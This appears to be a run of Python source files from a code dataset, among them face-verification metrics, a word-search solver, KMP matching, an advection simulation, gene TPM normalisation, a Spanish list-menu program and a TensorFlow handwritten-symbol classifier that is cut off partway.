acc_train[threshold_idx] = calculate_accuracy(threshold, \n dist[train_set], actual_issame[train_set])\n best_threshold_idx = np.argmax(acc_train)\n for threshold_idx, threshold in enumerate(thresholds):\n tprs[fold_idx, threshold_idx], fprs[fold_idx, threshold_idx], _ = \\\n calculate_accuracy(threshold, dist[test_set], actual_issame[test_set])\n _, _, accuracy[fold_idx] = calculate_accuracy(thresholds[best_threshold_idx],\n dist[test_set], actual_issame[test_set])\n\n tpr = np.mean(tprs, 0)\n fpr = np.mean(fprs, 0)\n return tpr, fpr, accuracy\n\n\ndef calculate_tar_far(threshold, dist, actual_issame):\n '''\n Calculate true acceptance rate and false acceptance rate\n '''\n predict_issame = np.less(dist, threshold)\n true_accept = np.sum(np.logical_and(predict_issame, actual_issame))\n false_accept = np.sum(np.logical_and(predict_issame, np.logical_not(actual_issame)))\n n_same = np.sum(actual_issame)\n n_diff = np.sum(np.logical_not(actual_issame))\n tar = float(true_accept) / float(n_same)\n far = float(false_accept) / float(n_diff)\n return tar, far\n\n\ndef calculate_tar(thresholds, embeddings1, embeddings2, actual_issame, far_target, \n nrof_folds=10, distance_metric=0, substract_mean=False):\n '''\n Using cross validation, Find the threshold in thresholds that fase acceptance \n will less than far_target. And then calculate true acceptance rate and \n corresponding std, fase acceptance rate\n\n Args:\n thresholds: all the thresholds use for calculate roc\n embeddings1: the first embeddings\n embeddings2: the second embeddings\n actual_issame: the true flag indicate which pair is same\n far_target: false acceptance rate target for find best threshold\n nrof_folds: number of folds\n distance_metric: the metric use for distance calculate[0:Euclidian 1:Cosine]\n subtract_mean: Subtract feature mean before calculating distance\n '''\n assert(embeddings1.shape[0] == embeddings2.shape[0])\n assert(embeddings1.shape[1] == embeddings2.shape[1])\n\n nrof_pairs = min(len(actual_issame), embeddings1.shape[0])\n nrof_thresholds = len(thresholds)\n k_fold = KFold(n_splits=nrof_folds, shuffle=False)\n\n tar = np.zeros(nrof_folds)\n far = np.zeros(nrof_folds)\n\n indices = np.arange(nrof_pairs)\n\n for fold_idx, (train_set, test_set) in enumerate(k_fold.split(indices)):\n if substract_mean:\n mean = np.mean(np.concatenate([embeddings1[train_set], \n embeddings2[train_set]], axis=0), axis=0)\n else:\n mean = 0\n dist = calculate_distance(embeddings1-mean, embeddings2-mean, distance_metric)\n\n # Find the threshold that gives FAR = far_target\n # which means that find threshold to make false acceptance rate \n # less than(or equal to) far_target\n far_train = np.zeros(nrof_thresholds)\n for threshold_idx, threshold in enumerate(thresholds):\n _, far_train[threshold_idx] = calculate_tar_far(threshold, \n dist[train_set], actual_issame[train_set])\n if np.max(far_train) >= far_target:\n f = interpolate.interp1d(far_train, thresholds, kind='slinear')\n threshold = f(far_target)\n else:\n threshold = 0.0\n\n tar[fold_idx], far[fold_idx] = calculate_tar_far(threshold, \n dist[test_set], actual_issame[test_set])\n \n tar_mean = np.mean(tar)\n far_mean = np.mean(far)\n tar_std = np.std(tar)\n return tar_mean, tar_std, far_mean","sub_path":"ml_utils/eval_metrics.py","file_name":"eval_metrics.py","file_ext":"py","file_size_in_byte":7125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"147562528","text":"class Solution:\n def exist(self, board, word):\n \"\"\"\n :type board: List[List[str]]\n :type word: str\n :rtype: bool\n \"\"\"\n for i in range(len(board)):\n for j in range(len(board[0])):\n if self.dfs(board, i, j, word):\n return True\n return False\n\n def dfs(self,board,i,j,word):\n if not word:\n return True\n if i not in range(len(board)) or j not in range(len(board[0])):\n return False\n if board[i][j]!=word[0]:\n return False\n tmp=board[i][j]\n board[i][j]='#'\n res=self.dfs(board,i-1,j,word[1:]) or self.dfs(board,i+1,j,word[1:]) or self.dfs(board,i,j-1,word[1:]) or self.dfs(board,i,j+1,word[1:])\n board[i][j]=tmp\n return res\n\ndef main():\n so=Solution()\n print(so.exist([[\"A\",\"B\",\"C\",\"E\"],[\"S\",\"F\",\"C\",\"S\"],[\"A\",\"D\",\"E\",\"E\"]],\"ABCCED\"))\n\nif __name__ == '__main__':\n main()","sub_path":"79_WordSearch.py","file_name":"79_WordSearch.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"595111786","text":"# TO DELETE vvvvvvvvvvvvvvv\nsign_up = [1,0]\nscans = [[1, 2, 4], [3, 6]]\n# TO DELETE ^^^^^^^^^^^^^^^\n\nf = open(\"solution\",\"w+\")\nf.write(\"%d\\n\" % len(sign_up))\ni = 0\nfor lib in sign_up :\n\tf.write(\"%d %d\\n\" % (lib, len(scans[i])))\n\tprint(*scans[i], sep=' ', end='\\n', file=f)\n\ti += 1\nf.close()","sub_path":"output.py","file_name":"output.py","file_ext":"py","file_size_in_byte":290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"466158112","text":"# KMP算法\n\n# 首先计算next数组,即我们需要怎么去移位\n# 接着我们就是用暴力解法求解即可\n# next是用递归来实现的\n# 这里是用回溯进行计算的\ndef calNext(str2):\n i=0\n next=[-1]\n j=-1\n while(i=len(s2)):\n return i -len(s2)#说明匹配到最后了\n else:\n return 0\ns1 = \"acabaabaabcacaabc\"\ns2 = \"abaabcac\"\nprint(KMP(s1,s2))\n","sub_path":"practice/practice_4/kmp1.py","file_name":"kmp1.py","file_ext":"py","file_size_in_byte":896,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"190119283","text":"\"\"\"\r\nD E P A R T E M E N F I S I K A - U G M\r\nBulaksumur Yogyakarta, Kabupaten Sleman 55281\r\n-------------------------------------------------------------------------------\r\nAuthor : Reizkian Yesaya .R\r\nEmail : reizkianyesaya@gmail.com\r\nProgram : Advection\r\nCreated : Wed Apr 24 22:23:10 2019\r\n\"\"\"\r\nimport numpy as np\r\nimport mayavi.mlab as mlab\r\nimport matplotlib.pyplot as plt\r\n\r\nN=2**9\r\nL=1\r\n#dt=0.01\r\nimg=(0+1.j)\r\nx = np.linspace(-L,L,N)\r\n\r\nu=0.02\r\nd=0\r\nnu=0.001\r\n\r\nf=np.zeros(N)\r\nfor i in range(int(N/2-50),int(N/2+50)):\r\n f[i]=1\r\n\r\n\r\nf = 1/(np.cosh(10.0*x)**2)\r\nf_hat = np.fft.fft(f)\r\n\r\n# k-space construction\r\nk_plus=np.arange(0,N/2+1,1)\r\nk_minus=np.arange(-N/2,0,1)\r\nk_array=np.hstack((k_plus,k_minus))\r\n\r\ndk=np.pi/L\r\nk=k_array*dk\r\nk2=k**2\r\n\r\ntmax=10\r\nN_t=100\r\ndt=tmax/N_t\r\n\r\nplt.plot(x,f)\r\nfor t in range(0,N_t,10):\r\n for i in range (0,N):\r\n c = (img*k[i]*u)-(k2[i]*d)\r\n f_hat[i]=f_hat[i]*np.exp(c*(t*dt))\r\n\r\n f_xt=np.real(np.fft.ifft(f_hat))\r\n\r\n time=dt*t\r\n print(\"time = \",time,\" sec\")\r\n plt.plot(x,f_xt)\r\n plt.grid(True)\r\n plt.show()\r\n\r\nprint(\"=== PROGRAM HAS BEEN SUCESSFULLY EXECUTED ===\")\r\n\r\n# =============================================================================\r\n# fig1 = plt.figure()\r\n# ax1 = fig1.add_subplot(111)\r\n# ax1.plot(k_array,f_fft,'r')\r\n# plt.title('')\r\n# plt.grid(True) \r\n# \r\n# fig2 = plt.figure()\r\n# ax2 = fig2.add_subplot(111)\r\n# ax2.plot(x,f,'b')\r\n# plt.title('')\r\n# plt.grid(True) \r\n# =============================================================================\r\n","sub_path":"Advection.py","file_name":"Advection.py","file_ext":"py","file_size_in_byte":1550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"109073185","text":"import numpy as np \nimport pandas as pa\nfrom scipy.sparse import csr_matrix, isspmatrix\nimport pyensembl \nfrom pyensembl import EnsemblRelease\n\ndef normalizeUMIWithscalefactor(data, scale_factor=10e6):\n cellNormalizedData=np.log(1+(data/np.sum(data,axis=1)[0]))*scale_factor\n return(cellNormalizedData)\n\ndef gene_Length(list_of_genes, ensembl_id=True, Ensembl_Release=75):\n gn=EnsemblRelease(Ensembl_Release)\n if ensembl_id:\n gene_pos=list(map(gn.locus_of_gene_id, list_of_genes))\n gene_pos_end=[i.end for i in gene_pos]\n gene_pos_start=[i.start for i in gene_pos]\n \n else:\n gene_pos=list(map(gn.loci_of_gene_names, list_of_genes))\n gene_pos_end=[i[0].end for i in gene_pos]\n gene_pos_start=[i[0].start for i in gene_pos]\n\n gene_len=np.array(gene_pos_end)-np.array(gene_pos_start)\n return pa.DataFrame({'gene_names':list_of_genes, \"gene_length\":gene_len/1000}) \n\ndef getTPM(rowCountData, gene_Names=None, index_column=None, ensembol_gene=False, Ensembl_release=75):\n\n if(isspmatrix(rowCountData)):\n rowCountData=pa.DataFrame(rowCountData.toarray())\n rowCountData.index=gene_Names\n \n else:\n if index_column is not None:\n rowCountData.index=rowCountData[index_column]\n rowCountData=rowCountData.drop([index_column], axis=1)\n\n if ensembol_gene:\n known_genes=list(map(pyensembl.common.is_valid_ensembl_id,gene_Names)) \n rowCountData=rowCountData.iloc[known_genes,:]\n \n rowCountData.index=np.array(gene_Names)[np.array(known_genes)]\n \n gene_length=gene_Length(gene_Names, ensembl_id=ensembol_gene, Ensembl_Release=Ensembl_release) \n else:\n\n gene_length=gene_Length(gene_Names, ensembl_id=ensembol_gene, Ensembl_Release=Ensembl_release) \n \n if(gene_length.shape[0]==rowCountData.shape[0]):\n \n count_data_RKB=rowCountData.div(list(gene_length[\"gene_length\"]), axis=0)\n \n count_data_TPM=np.array(count_data_RKB)/ np.array(rowCountData.sum(axis=0)).reshape((1,len(rowCountData.sum(axis=0))))\n \n count_data_TPM=pa.DataFrame(count_data_TPM*10e6)\n count_data_TPM.index=list(rowCountData.index)\n count_data_TPM.columns=list(rowCountData.columns)\n \n count_data_TPM=count_data_TPM[(count_data_TPM.T != 0).any()].dropna(axis=0)\n else:\n print(\"one or more gene ids are not annoatated under\", Ensembl_Release, \"Please use different release\")\n \n return count_data_TPM.T, list(count_data_TPM.index)\n\ndef ENSEMBLID_to_geneSymbol(ENSEMBL, Ensembl_Release=75): \n data=EnsemblRelease(Ensembl_Release)\n if type(ENSEMBL) is list:\n Genes=list(map(data.gene_name_of_gene_id,ENSEMBL))\n else:\n Genes=data.gene_name_of_gene_id(ENSEMBL)\n return Genes\n\n","sub_path":"MICTI/normalize.py","file_name":"normalize.py","file_ext":"py","file_size_in_byte":2825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"335232351","text":"# Este es el procedimientos para crear y llenar la lista o el arreglo\ndef crear_lista():\n\tglobal lista\n\tlista=[]\n\tprint(\"Cuanto elementos tendra la lista\")\n\telementos=input()\n\telementos=int(elementos)\n\tfor i in range(0,elementos):\n\t\tprint(\"Ingrese el valor de el elemento: \",i)\n\t\tvalor=input()\n\t\tvalor=int(valor)\n\t\tlista.append(valor)\n\t\t\n#Agregar Elemento a la lista \ndef agregar_elemento():\n\tprint (\"Ingrese la posicion que quiere agregar :\")\n\tposicion=input()\n\tposicion=int(posicion)\n\tprint (\"Ingrese el valor que quiere agregar :\")\n\tnuevo_elemento=input()\n\tnuevo_elemento=int(nuevo_elemento)\n\tlongitud=len(lista)\n\tlongitud=int(longitud)\n\tif posicion>longitud or posicion<0:\n\t\tprint(\"Indice debe de estar entre 0 y \",longitud )\n\telse:\n\t\tlista.insert(posicion,nuevo_elemento)\n\t\tprint(\"Nuevo Elemento Agregado Correctamente \")\n\t\n#Modificar Elemento a la lista \ndef modificar_elemento():\n\tprint (\"Ingrese la posicion que quiere modificar :\")\n\tposicion=input()\n\tposicion=int(posicion)\n\tprint (\"Ingrese el valor que quiere modificar :\")\n\tnuevo_elemento=input()\n\tnuevo_elemento=int(nuevo_elemento)\n\tlongitud=len(lista)\n\tlongitud=int(longitud)\n\tif posicion>longitud or posicion<0:\n\t\tprint(\"Para modificar el indice debe de estar entre 0 y \",longitud )\n\telse:\n\t\tlista[posicion]=nuevo_elemento\n\t\tprint(\"El Elemento ha sido modificado correctamente \")\n\n#Eliminar Elemento a la lista \ndef eliminar_elemento():\n\tprint (\"indique el indice a eliminar\")\n\tindice=input()\n\tindice=int(indice)\n\tlongitud=len(lista)\n\tlongitud=int(longitud)\n\tif indice>longitud or indice<0:\n\t\tprint(\"Para eliminar el indice debe de estar entre 0 y \",longitud-1 )\n\telse:\n\t\tdel lista[indice]\n\t\tprint(\"Elemento eliminado \")\n\t\n\n#Este es el procedimiento que me muestra la lista \ndef mostrar_lista():\n\tprint(\"La lista es : \" ,lista)\n\t \n#---------------Cuerpo principal-------------------------------\nsalir=0\nwhile salir!=5:\n\tprint (\"\\t\\t\\t================================\\n\")\n\tprint (\"\\t\\t\\tOPERACIONES CON LISTAS\\n\\n\")\n\tprint (\"\\t\\t\\t[1. Crear una lista ]\\n\")\n\tprint (\"\\t\\t\\t[2. Ingresar datos a la lista ]\\n\")\n\tprint (\"\\t\\t\\t[3. Modificar datos de la lista]\\n\")\n\tprint (\"\\t\\t\\t[4. Eliminar datos de la lista ]\\n\")\n\tprint (\"\\t\\t\\t[5. Salir del programa ]\\n\")\n\topcion=int(input(\"\\t\\t\\t[Ingrese una opcion : \"))\n\tprint (\"\\t\\t\\t================================\\n\")\n\t\n\tif opcion==1:\n\t\tcrear_lista()\n\t\tmostrar_lista()\n\telif opcion==2:\n\t\ttry:\n\t\t\tagregar_elemento()\n\t\t\tmostrar_lista()\n\t\texcept:\n\t\t\tprint (\"Se genero un error es posible que la lista no ha sido creada,\\n Verifique opcion 1 \")\n\telif opcion==3:\n\t\ttry:\n\t\t\tmodificar_elemento()\n\t\t\tmostrar_lista()\n\t\texcept:\n\t\t\tprint (\"Se genero un error es posible que la lista no ha sido creada,\\n Verifique opcion 1 \")\n\telif opcion==4:\n\t\ttry:\n\t\t\teliminar_elemento()\n\t\t\tmostrar_lista()\n\t\texcept:\n\t\t\tprint (\"Se genero un error es posible que la lista no ha sido creada,\\n Verifique opcion 1 \")\n\telif opcion==5:\n\t\tprint(\"\\t\\t\\tFin del programa\")\n\t\tsalir=5\n\telse:\n\t\tprint(\"\\t\\t\\tOpcion incorrecta\")","sub_path":"EjercicioListas.py","file_name":"EjercicioListas.py","file_ext":"py","file_size_in_byte":3014,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"418195838","text":"from __future__ import division\nfrom __future__ import print_function\n#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Apr 25 17:06:17 2017\n\n@author: paulcabrera\n\nRUN:\n$ source ~/tensorflow/bin/activate\n$ python 5-4-17.py ./annotate/\n\"\"\"\n\n\"\"\"\nComments:\n \n \n - We're allowed to submit our model to TAs before the deadline so they can run it and let us know the results.\n \n - maybe try to make some predictions on the examples folder\n \n - More training and test data? MNIST?\n http://www.ee.surrey.ac.uk/CVSSP/demos/chars74k/: may have to invert colors and delete folders for symbols that\n don't appear. \n - An issue with using MNIST is it has more digits than necessary. We just need 0, 1, 2, 3, 4, 6. So maybe filter the\n other digits out\n - equations.pdf:\n - Other symbols: =, +, -, division sign, bar division sign, (, ), pi, sqrt, delta, ..., +- sign\n - Having trouble finding data for the above symbols.\n - letters: x, y, a, b, c, m, n, d, p, k, f, s, i, o, t, A\n \n - We may not have enough data for the more complicated neural network to work properly.\n \n - Perhaps reducing the number of layers would lead to better results\n \n - I increased the batch size to train the model properly given the more complex neural network\n \n - Consider using TA's input_wrapper instead of the various functions I use to transform the image.\n \n - predictions.txt results are far more inaccurate currently using the more complex neural network compared to the simple one\n\"\"\"\n\nimport sys\nimport glob\nfrom PIL import Image, ImageFilter\nimport skimage.measure as skm\nimport scipy.misc as scm\nimport numpy as np\nimport skimage.morphology as morphology\nimport tensorflow as tf\nfrom skimage.transform import resize,warp,AffineTransform\n\ntrainpath = sys.argv[-1] # # path for the folder containg the training images i.e. the path for 'annotated'\ntf.reset_default_graph() # http://stackoverflow.com/questions/41400391/tensorflow-saving-and-resoring-session-multiple-variables\n\nclass SymPred():\n\t# prediction is a string; the other args are ints\n\tdef __init__(self,prediction, x1, y1, x2, y2):\n\t\t\"\"\"\n\t\t is the top-left and bottom-right coordinates for the bounding box\n\t\t(x1,y1)\n\t\t\t .--------\n\t\t\t |\t\t|\n\t\t\t |\t\t|\n\t\t\t\t--------.\n\t\t\t\t\t\t (x2,y2)\n\t\t\"\"\"\n\t\tself.prediction = prediction \n\t\tself.x1 = x1\n\t\tself.y1 = y1\n\t\tself.x2 = x2\n\t\tself.y2 = y2\n\tdef __str__(self):\n\t\treturn self.prediction + '\\t' + '\\t'.join([\n\t\t\t\t\t\t\t\t\t\t\t\tstr(self.x1),\n\t\t\t\t\t\t\t\t\t\t\t\tstr(self.y1),\n\t\t\t\t\t\t\t\t\t\t\t\tstr(self.x2),\n\t\t\t\t\t\t\t\t\t\t\t\tstr(self.y2)])\n\ndef padim(im):\n\t\"\"\" Pads image to make it into a square.\n\t\n\tParameters\n\t----------\n\tim : ndarray\n\t\tAn image to be padded.\n\t\t\n\tReturns\n\t-------\n\tndarray\n\t\tA copy of im with padding.\n\t\"\"\"\n\trows = len(im)\n\tcols = len(im[0])\n\tzeros = max(rows, cols) - min(rows, cols)\n\tleft, right, top, bottom = 0, 0, 0, 0\n\tif rows > cols:\n\t\tleft = zeros//2\n\t\tright = zeros - left\n\telif rows < cols:\n\t\ttop = zeros//2\n\t\tbottom = zeros - top\n\treturn np.pad(im, ((top, bottom), (left, right)), 'constant')\n\ndef fullpadim(im):\n\t\"\"\" Pads left, right, bottom, and top with zeros and then do additional padding to make image into a square.\n\t\n\tParameters\n\t----------\n\tim : ndarray\n\t\tAn image to be padded.\n\t\t\n\tReturns\n\t-------\n\tndarray\n\t\tA copy of im with padding.\n\t\"\"\"\n\trows = len(im)\n\tcols = len(im[0])\n\tzeros = max(rows, cols) - min(rows, cols)\n\tleft = zeros//2\n\tright = zeros - left\n\tleft = right\n\tbottom = zeros//2\n\ttop = zeros - bottom\n\tbottom = top\n\tim = np.pad(im, ((top, bottom), (left, right)), 'constant')\n\tif len(im) != len(im[0]):\n\t\tim = padim(im)\n\treturn im\n\ndef cropim(im):\n\t\"\"\" Returns image that has been cropped using a bounding box.\n\t\n\tReference: http://chayanvinayak.blogspot.com/2013/03/bounding-box-in-pilpython-image-library.html\n\t\n\tParameters\n\t----------\n\tim : ndarray\n\t\tAn image to be cropped.\n\t\n\tReturns\n\t-------\n\tndarray\n\t\tA copy of im cropped using bound box obtained from ???\n\t\"\"\"\n\tim = Image.fromarray(im)\n\tz = im.split()\n\tleft,upper,right,lower = z[0].getbbox() \n\t#im = (im.crop((left,upper,right,lower))).filter(ImageFilter.SHARPEN) # filter doesn't work for some reason \n\tim = (im.crop((left,upper,right,lower)))\n\treturn np.array(im.getdata()).reshape((im.size[1], im.size[0])) # confirmed it's im.size[1] and im.size[0] in that order\n\t\ndef normalize(im):\n\t\"\"\" Normalize ndarray to values between 0 and 1\n\t\n\tParameters\n\t----------\n\timg : ndarray\n\t\tImage data to be normalized.\n\t\t\n\tReturns\n\t-------\n\tndarray\n\t\tA normalized copy of im.\n\t\"\"\"\n\treturn im / im.max() # MNIST data says 0 means white and 255 means black. MNIST images are normalized between 0 and 1. \n\t\ndef newim(im):\n\t\"\"\" Returns a normalized and padded square 28x28 pixel copy of an equation component.\n\t\n\tParameters\n\t----------\n\tim : ndarray\n\t\tImage data.\n\t\n\tReturns\n\t-------\n\tndarray\n\t\tA normalized, padded, square copy of im.\n\t\n\t\"\"\"\n\treturn normalize(fullpadim(im))\n\ndef connectedcomps(im):\n\t\"\"\" Returns a list of connected components as ndarrays that have more than 50 pixels\n\t\n\tParameters\n\t----------\n\tim : ndarray\n\t\tImage of an equation.\n\t\t\n\tReturns\n\t-------\n\t(ndarray, ndarray)\t\n\t\tA kist of the equation's components and a list of corresponding bounding box coordinates.\n\t\"\"\"\n\tcomps = skm.regionprops(skm.label(im > 0)) # im > 0 leads to all values greater than 0 becoming True i.e. 1 and all equal to 0 False i.e. 0\n\t# I am not entirely sure if im > 0 is necessary since I omit components with fewer than 50 pixels in the code below\n\t# Without the if condition and without im > 0, however, we get an unreasonably high number of components, most of which are useless\n\tbbcoords = []\n\tnewcomps = []\n\tfor i in range(len(comps)):\n\t\tif comps[i].area < 50:\n\t\t\tcontinue\n\t\tbbcoords += [comps[i].bbox]\n\t\tnewcomps += [normalize(morphology.dilation(\n\t\t\t\t\t\t\t scm.imresize(\n\t\t\t\t\t\t\t\t\tfullpadim(cropim(np.asarray(comps[i].image, dtype=np.float32))), \n\t\t\t\t\t\t\t\t\t(32, 32), 'bicubic')))]\n\treturn (newcomps, bbcoords)\t \n\ndef getlocalpath(path):\n\t\"\"\" Returns the last value of a filepath.\n\t\n\tParameters\n\t----------\n\tpath : string\n\t\tA complete image file path.\t Ex: 'path/to/a/file.png'\n\t\n\tReturns\n\t-------\n\tstring\n\t\tThe containing directory of path.\n\t\"\"\"\n\treturn path.split('/')[-1]\n\ndef geteqnpath(path):\n\t\"\"\" Given the full path for a symbol, return the path of the corresponding equation.\n\t\n\tParameters\n\t----------\n\tpath : string\n\t\tA complete image component file path. Ex: '$home/annotated/SKMBT_36317040717260_eq2_sqrt_22_98_678_797.png'\n\t\t\n\tReturns\n\t-------\n\tstring\n\t\tPath of the corresponding equation image. Ex: '$home/annotated/SKMBT_36317040717260_eq2.png'\t\t\n\t\"\"\"\n\ts = \"\"\n\tcount = 0 # keeps track of number of underscores encountered\n\tfor c in path:\n\t\tif c == '_':\n\t\t\tcount += 1\n\t\tif count == 3:\n\t\t\tbreak\n\t\ts += c\n\tif '.png' in s:\n\t\treturn s\n\treturn s + '.png'\n\t\t\n\ndef getdict(folder):\n\t\"\"\" Returns a dictionary where the key is the equation image path and the value is a list of paths for the symbols of the equation.\n\t\n\tParameters\n\t----------\n\tfolder : string\n\t\tThe full path of the folder containing the annotated images.\n\t\n\tReturns\n\t-------\n\tdict(string, list(string))\n\t\tA dictionary of image paths keys and component path list values.\n\t\"\"\"\n\tpaths = glob.glob(folder+'/*.png')\n\teqns = {}\n\td = {}\n\tiseqn = False\n\ti = -5\n\ts = ''\n\tfor p in paths:\n\t\tc = p[i] # p[-5], which is the character right before the .png\n\t\t# use this loop to see if 'eq' occurs before the first instance of '_' when going in reverse order\n\t\twhile c != '_' and (not iseqn) and abs(i) <= len(p): \n\t\t\ts += c\n\t\t\tif 'eq' in s[::-1]: # reverse of s since s is being built up in reverse\n\t\t\t\tiseqn = True\n\t\t\ti -= 1\n\t\t\tif abs(i) <= len(p):\n\t\t\t\tc = p[i]\n\t\tif iseqn: \n\t\t\teqns[p] = []\n\t\telse: # path is for an image of a symbol, not equation\n\t\t\teqnpath = geteqnpath(p)\n\t\t\tif eqnpath in eqns: # otherwise: FileNotFoundError\n\t\t\t\tif eqnpath not in d:\n\t\t\t\t\td[eqnpath] = []\n\t\t\t\td[eqnpath] += [p]\n\t\ts = ''\n\t\tiseqn = False\n\t\ti = -5\n\treturn d\n\t\ndef getsypaths(folder):\n\td = getdict(folder)\n\tlst = list(d.values())\n\tsypaths = []\n\tfor e in lst:\n\t\tif e:\t# not the empty list\n\t\t\tsypaths += e\n\treturn sypaths\n\ndef geteqpaths(folder):\n\td = getdict(folder)\n\treturn list(d.keys())\n\n ### CHANGED: Using a (32, 32) image now and I moved the np.resize function elsewhere ###\ndef transform(im):\n\treturn normalize(morphology.dilation(scm.imresize(fullpadim(im), (32, 32), 'bicubic')))\n \ndef geteqims(folder):\n\treturn [(scm.imread(impath), impath) for impath in geteqpaths(folder)]\n\t\t \n# Get the images of the symbols. These will be used as training data\n# list of tuples: (ndarray length 28*28 of image, imagepath)\ndef getsyims(folder):\n\treturn [(transform(scm.imread(impath)), impath) for impath in getsypaths(folder)]\n\t\t\t\n# given the path for a symbol in the format of images in annotated, extract the label\ndef getlabel(path):\n\t# once you get to the 4th underscore as you move backwards through the path, build the string until you reach the 5th underscore\n\tcount = 0 # count of underscores\n\tlabel = ''\n\ti = -1\n\twhile count < 5 and abs(i) <= len(path):\n\t\tif path[i] == '_':\n\t\t\tcount += 1\n\t\telif count == 4: # assuming '_' is not a valid symbol\n\t\t\tlabel += path[i]\n\t\ti -= 1\n\treturn label[::-1] # reverse\n\t\n# Add the corresponding label to each tuple for the argument trainims, which is the result of getsyims(trainpath)\ndef addlabel(trainims):\n\t\"\"\" Add the corresponding label to each tuple for the argument trainims, which is the result of getsyims(trainpath).\n\t\n\tParameters\n\t----------\n\ttrainims : *** type ***\n\t\t*** Description of trainims ***\n\t\n\tReturns\n\t-------\n\t*** return type ***\n\t\t*** Description of return type ***\n\t\"\"\"\n\treturn [(im, impath, getlabel(impath)) for (im, impath) in trainims]\n\t\ndef unpack(syims):\n\t\"\"\" *** Description here ***\n\t\n\tParameters\n\t----------\n\tsyims : ** type **\n\t\t** Description here. **\n\t\n\tReturns\n\t-------\n\t(array.**type**, array.**type**, array.**type**)\n\t\tims - \n\t\tpaths -\n\t\tlabels -\n\t\"\"\"\n\tims, paths, labels = [], [], []\n\tfor e in syims:\n\t\tims += [e[0]]\n\t\tpaths += [e[1]]\n\t\tlabels += [e[2]]\n\t#return (np.asarray(ims), np.asarray(paths), np.asarray(labels)) # currently seems unnecessary based on what I'm doing in my_next_batch\n\treturn (ims, paths, labels)\t\t \n\n# args: lst - sorted list of unique labels e.g. labellst = list(set(labels)).sorted()\n# returns dictionary of onehot lists for each label\ndef oneHot(lst):\n\t\"\"\" *** Description ***\n\t\n\tParameters\n\t----------\n\tlst : list\n\t\tSorted list of unique labels. e.g. labellst = list(set(labels)).sorted()\n\t\t\n\tReturns\n\t-------\n\tdict.***type***\n\t\tDictionary of onehot lists for each label.\n\t\"\"\"\n\td = {}\t\n\tn = len(lst)\n\tonehotlst = [0]*n # list of zeros of length len(lst)\n\ti = 0\n\tfor label in lst:\n\t\tonehotlst[i] = 1\n\t\td[label] = onehotlst\n\t\tonehotlst = [0]*n\n\t\ti += 1\n\treturn d\n\t\n# return an ndarray of one-hot lists for every element. INCOMPLETE\ndef oneHotTotal(lst):\n\t\"\"\" Return an ndarray of one-hot lists for every element. INCOMPLETE\n\t\n\tParameters\n\t----------\n\tlst : list\n\t\tList of component labels.\n\t\n\tReturns\n\t-------\n\tarray.list.\n\t\tArray of one-hot lists.\n\t\"\"\"\n\tarr = np.asarray(oneHot(lst[0]))\n\tfor i in range(1, len(lst)):\n\t\tarr = np.vstack((arr, oneHot(lst[i])))\n\treturn arr\n\nsyims = addlabel(getsyims(trainpath)) # symbol (not equation) images; result is list of 3-element tuples: \n\n(trainims, trainpaths, labels) = unpack(syims)\nlabellst = list(set(labels)) \nlabellst.sort() # sorted list of unique labels\nonehotdict = oneHot(labellst)\n\n\t\n# affine transformation\ndef image_deformation(image):\n random_shear_angl = np.random.random() * np.pi/6 - np.pi/12\n random_rot_angl = np.random.random() * np.pi/6 - np.pi/12 - random_shear_angl\n random_x_scale = np.random.random() * .4 + .8\n random_y_scale = np.random.random() * .4 + .8\n random_x_trans = np.random.random() * image.shape[0] / 4 - image.shape[0] / 8\n random_y_trans = np.random.random() * image.shape[1] / 4 - image.shape[1] / 8\n dx = image.shape[0]/2. \\\n - random_x_scale * image.shape[0]/2 * np.cos(random_rot_angl)\\\n + random_y_scale * image.shape[1]/2 * np.sin(random_rot_angl + random_shear_angl)\n dy = image.shape[1]/2. \\\n - random_x_scale * image.shape[0]/2 * np.sin(random_rot_angl)\\\n - random_y_scale * image.shape[1]/2 * np.cos(random_rot_angl + random_shear_angl)\n trans_mat = AffineTransform(rotation=random_rot_angl,\n translation=(dx + random_x_trans,\n dy + random_y_trans),\n shear = random_shear_angl,\n scale = (random_x_scale,random_y_scale))\n return warp(image,trans_mat.inverse,output_shape=image.shape)\n \n# uses variables defined outside of this function: trainims, trainpaths, labellst\n### CHANGED ###\ndef my_next_batch(batch_size=10):\n\t\"\"\" *** Description ***\n\t\t\n\tParameters\n\t----------\n\ttrainims : ** type **\n\t\t*** Description of trainims ***\n\t\n\tReturns\n\t-------\n\t(array, array, array)\n\t\tbatch_x - numpy pixel arrays for each symbol\n\t\tbatch_y - one hot tensors for each symbol\n\t\tbatch_z - image path for the symbol's associate equation\n\t\"\"\"\n\t# randomly pick ten elements from trainims\n\tsize = len(trainims)\n\tindices = [np.random.randint(0, size) for j in range(batch_size)]\n\tnumlabels = len(labellst)\n\tbatch_x = np.zeros((batch_size, 32*32))\n\tbatch_y = np.zeros((batch_size, numlabels)) # rows = batch_size and cols = # of unique symbols\n\tbatch_z = np.empty((batch_size, 1), dtype='= 1e-6:\n learn_rate /= 2.\n phist = train_accuracy\t\n\ttrain_step.run(feed_dict={x: batch[0], y_: batch[1], keep_prob: 1., l_rate: learn_rate}) # changed keep_prob to 1.\n\t\nsave_path = saver.save(sess, 'my-model2') \nprint ('Model saved in file: ', save_path) \n\neqims = geteqims(trainpath) # tuple: (ndarray, path) for images of equations\n#ims comps is a list of 2-element tuples: ((list of ndarrays for components, list of corresponding bounding box coordinates), equationpath)\nimscomps = [(connectedcomps(i[0]), i[1]) for i in eqims] # \n\n# uses variables defined outside function: imscomps\ndef formatcomps():\n\ttestdata = [] \n\tfor eq in imscomps: # components and path for a particular equation\n\t\t# eq[0] is a tuple: (list of ndarrays for components, list of corresponding bounding box coordinates)\n\t\tnumcomps = len(eq[0][0])\n\t\tfor i in range(len(eq[0][0])):\n\t\t\ttestdata += [(np.resize(eq[0][0][i], 32*32), eq[0][1][i], 